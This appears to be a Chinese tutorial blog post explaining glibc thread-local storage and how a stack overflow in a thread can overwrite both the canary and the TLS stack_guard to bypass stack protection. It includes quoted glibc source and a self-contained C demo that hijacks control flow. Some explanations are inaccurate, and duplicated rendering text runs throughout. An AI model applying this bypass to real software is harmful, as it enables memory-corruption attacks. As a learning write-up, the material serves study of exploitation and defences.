0x0 前置知识
我们都知道,在多线程下面修改一个全局变量会发生冲突的问题,而一般的解决方法就是给全局变量进行加锁。根据用途和策略,有读锁和写锁之分。这样子虽然解决了冲突的问题,但是不免过于麻烦。这就引入了一种叫做 线 程 局 部 存 储 ( T h r e a d L o c a l S t o r a g e ) \textcolor{orange}{线程局部存储(Thread Local Storage)} 线程局部存储(ThreadLocalStorage)的机制,即为每一个线程分配一个变量的实例,这种机制也可以避免上述的情况。该机制在不同的系统上面实现的方式也不一样,本章只讨论在 l i n u x X 86 − 64 \textcolor{orange}{linux X86-64} linuxX86−64架构中的实现。
0x1 原理探究
【环境】:Ubuntu18.04 Glibc2.27
Linux中调用 p t h r e a _ c r e a t e ( ) \textcolor{cornflowerblue}{pthrea\_create()} pthrea_create()函数的时候实际会调用到 _ _ p t h r e a d _ c r e a t e _ 2 _ 1 ( ) \textcolor{cornflowerblue}{\_\_pthread\_create\_2\_1()} __pthread_create_2_1()函数。该函数位于 g l i b c 2.27 / n p t l / p t h r e a d _ c r e a t e . c : 608 \textcolor{orange}{glibc2.27/nptl/pthread\_create.c:608} glibc2.27/nptl/pthread_create.c:608
主要关注的如下代码段:
int
__pthread_create_2_1 (pthread_t *newthread, const pthread_attr_t *attr,
void *(*start_routine) (void *), void *arg)
{
STACK_VARIABLES;
const struct pthread_attr *iattr = (struct pthread_attr *) attr;
struct pthread_attr default_attr;
bool free_cpuset = false;
...
struct pthread *pd = NULL;
int err = ALLOCATE_STACK (iattr, &pd);//重点,为新线程分配tcb
int retval = 0;
if (__glibc_unlikely (err != 0))
{
retval = err == ENOMEM ? EAGAIN : err;
goto out;
}
#if TLS_TCB_AT_TP
/* Reference to the TCB itself. */
pd->header.self = pd;
/* Self-reference for TLS. */
pd->header.tcb = pd;
#endif
pd->start_routine = start_routine;
pd->arg = arg;
/* Copy the thread attribute flags. */
struct pthread *self = THREAD_SELF;
pd->flags = ((iattr->flags & ~(ATTR_FLAG_SCHED_SET | ATTR_FLAG_POLICY_SET))
| (self->flags & (ATTR_FLAG_SCHED_SET | ATTR_FLAG_POLICY_SET)));
pd->joinid = iattr->flags & ATTR_FLAG_DETACHSTATE ? pd : NULL;
/* The debug events are inherited from the parent. */
pd->eventbuf = self->eventbuf;
pd->schedpolicy = self->schedpolicy;
pd->schedparam = self->schedparam;
/* Copy the stack guard canary. */
#ifdef THREAD_COPY_STACK_GUARD
THREAD_COPY_STACK_GUARD (pd);
#endif
/* Copy the pointer guard value. */
#ifdef THREAD_COPY_POINTER_GUARD
THREAD_COPY_POINTER_GUARD (pd);
#endif
/* Verify the sysinfo bits were copied in allocate_stack if needed. */
#ifdef NEED_DL_SYSINFO
CHECK_THREAD_SYSINFO (pd);
#endif
*newthread = (pthread_t) pd;
LIBC_PROBE (pthread_create, 4, newthread, attr, start_routine, arg);
atomic_increment (&__nptl_nthreads);//增加一个线程计数
bool stopped_start = false; bool thread_ran = false;
/* Start the thread. */
if (__glibc_unlikely (report_thread_creation (pd)))
{
stopped_start = true;
retval = create_thread (pd, iattr, &stopped_start,
STACK_VARIABLES_ARGS, &thread_ran);
if (retval == 0)
{
assert (stopped_start);
assert (pd->stopped_start);
pd->eventbuf.eventnum = TD_CREATE;
pd->eventbuf.eventdata = pd;
/* Enqueue the descriptor. */
do
pd->nextevent = __nptl_last_event;
while (atomic_compare_and_exchange_bool_acq (&__nptl_last_event,
pd, pd->nextevent)
!= 0);
__nptl_create_event ();
}
}
else
retval = create_thread (pd, iattr, &stopped_start,
STACK_VARIABLES_ARGS, &thread_ran);
if (__glibc_unlikely (retval != 0))
{
if (thread_ran)
assert (stopped_start);
else
{
atomic_decrement (&__nptl_nthreads);//增加一个线程计数
if (__glibc_unlikely (atomic_exchange_acq (&pd->setxid_futex, 0)
== -2))
futex_wake (&pd->setxid_futex, 1, FUTEX_PRIVATE);
__deallocate_stack (pd);
}
/* We have to translate error codes. */
if (retval == ENOMEM)
retval = EAGAIN;
}
...
return retval;
}
源码中的注释是很丰富的,这里为了节省篇幅就删掉了。概括地说,创建线程的实质就是创建tcbhead_t,并设置tcbhead_t,并将TCB链入链表。
源码第14行的宏使用了 m m a p ( ) \textcolor{cornflowerblue}{mmap()} mmap()创建tcbhead_t。
tcbhead_t结构体定义如下:
typedef struct
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard; /* canary,0x28偏移 */
uintptr_t pointer_guard;
……
} tcbhead_t;
返回的tcbhead_t指针会作为新建线程的ID。
一开始,在 _ _ s t a r t _ l i b c _ m a i n ( ) \textcolor{cornflowerblue}{\_\_start\_libc\_main()} __start_libc_main()函数中会初始化Canary,并保存在 g s : [ 0 x 14 ] \textcolor{orange}{gs:[0x14]} gs:[0x14]和 f s : [ 0 x 28 ] \textcolor{orange}{fs:[0x28]} fs:[0x28]中,fs寄存器会一直指向TLS结构。新建立的线程会通过 T H R E A D _ S E T _ S T A C K _ G U A R D \textcolor{orange}{THREAD\_SET\_STACK\_GUARD} THREAD_SET_STACK_GUARD宏,将Canary设置到如上结构的stack_guard中(上面源码的第48行)。在函数准备返回之前,就会通过读取栈上的Canary与stack_guard进行异或,为0则鉴定无溢出。因此,如果一个线程函数中存在栈溢出,则有可能通过同时覆盖Canary和stack_guard实现绕过。
溢出的长度 o f f s e t = T h r e a d I d + 0 x 28 − B u f f e r _ a d d r \textcolor{orange}{offset=ThreadId+0x28-Buffer\_addr} offset=ThreadId+0x28−Buffer_addr,且 o f f s e t < p a g e _ s i z e ( 0 x 4000 ) \textcolor{orange}{offset<page\_size(0x4000)} offset<page_size(0x4000),溢出范围不能跨页!
0x2 实例测试
#include<unistd.h>
#include<stdio.h>
#include<pthread.h>
#include <asm/prctl.h>
void Bingo() {
puts("Bingo~");
exit(0);
}
void * vul(void *x)
{
unsigned long *addr;
arch_prctl(ARCH_GET_FS, &addr);
unsigned long * ret = __builtin_frame_address(0);
printf("FS:0x%p\n",addr);
printf("Canary_addr:0x%p \nCanary_val:0x%p\n", &ret[-1],ret[-1]);
unsigned long offset =(unsigned long)( (char*)addr - (char*)&ret[-1]) + 0x30;
printf("offset:%d\n",offset);
char *buf=(char*)malloc(offset);
char *p=(char*)&Bingo;
memset(buf,'a',offset);
memcpy(&buf[16],&p,8);
memcpy(&ret[-1],buf, offset);
return 0;
}
int main(int argc, char **argv, char **envp)
{
pthread_t one;
void *val;
pthread_create(&one, NULL, &vul, 0);
printf("Thread Id:0x%p\n",one);
pthread_join(one,&val);
return 0;
}
- _ _ b u i l t i n _ f r a m e _ a d d r e s s ( 0 ) \textcolor{cornflowerblue}{\_\_builtin\_frame\_address(0)} __builtin_frame_address(0):获取函数调用地址(及当前栈中的rbp或ebp)
- _ _ b u i l t i n _ f r a m e _ a d d r e s s ( 1 ) \textcolor{cornflowerblue}{\_\_builtin\_frame\_address(1)} __builtin_frame_address(1):获取函数返回地址
可见虽然成功劫持了程序流,但是在执行完目标函数返回时由于前面的溢出操作导致栈被破坏,所以触发段错误。这也提醒了一点——当我们使用ROP技术时应考虑栈迁移。